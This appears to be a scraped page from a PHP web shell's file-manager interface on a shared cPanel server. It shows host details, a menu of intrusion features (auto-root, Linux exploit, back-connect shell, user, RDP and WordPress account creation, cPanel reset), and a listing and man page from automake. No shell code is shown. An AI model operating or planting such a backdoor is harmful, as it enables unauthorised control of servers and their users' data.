Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.56
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
automake-1.11 /
[ HOME SHELL ]
Name
Size
Permission
Action
Automake
[ DIR ]
drwxr-xr-x
am
[ DIR ]
drwxr-xr-x
COPYING
34.32
KB
-rw-r--r--
INSTALL
15.21
KB
-rw-r--r--
acinstall
1.52
KB
-rwxr-xr-x
ansi2knr.1
1.49
KB
-rw-r--r--
ansi2knr.c
19.79
KB
-rw-r--r--
compile
3.68
KB
-rwxr-xr-x
config-ml.in
24.5
KB
-rw-r--r--
config.guess
43.89
KB
-rwxr-xr-x
config.sub
33.62
KB
-rwxr-xr-x
depcomp
18.18
KB
-rwxr-xr-x
elisp-comp
2.63
KB
-rwxr-xr-x
install-sh
13.34
KB
-rwxr-xr-x
mdate-sh
5.48
KB
-rwxr-xr-x
missing
11.15
KB
-rwxr-xr-x
mkinstalldirs
3.46
KB
-rwxr-xr-x
py-compile
4.09
KB
-rwxr-xr-x
symlink-tree
2.21
KB
-rwxr-xr-x
texinfo.tex
288.23
KB
-rw-r--r--
ylwrap
6.03
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ansi2knr.1
.TH ANSI2KNR 1 "19 Jan 1996" .SH NAME ansi2knr \- convert ANSI C to Kernighan & Ritchie C .SH SYNOPSIS .I ansi2knr [--varargs] input_file [output_file] .SH DESCRIPTION If no output_file is supplied, output goes to stdout. .br There are no error messages. .sp .I ansi2knr recognizes function definitions by seeing a non-keyword identifier at the left margin, followed by a left parenthesis, with a right parenthesis as the last character on the line, and with a left brace as the first token on the following line (ignoring possible intervening comments). It will recognize a multi-line header provided that no intervening line ends with a left or right brace or a semicolon. These algorithms ignore whitespace and comments, except that the function name must be the first thing on the line. .sp The following constructs will confuse it: .br - Any other construct that starts at the left margin and follows the above syntax (such as a macro or function call). .br - Some macros that tinker with the syntax of the function header. .sp The --varargs switch is obsolete, and is recognized only for backwards compatibility. The present version of .I ansi2knr will always attempt to convert a ... argument to va_alist and va_dcl. .SH AUTHOR L. Peter Deutsch <ghost@aladdin.com> wrote the original ansi2knr and continues to maintain the current version; most of the code in the current version is his work. ansi2knr also includes contributions by Francois Pinard <pinard@iro.umontreal.ca> and Jim Avera <jima@netcom.com>.
Close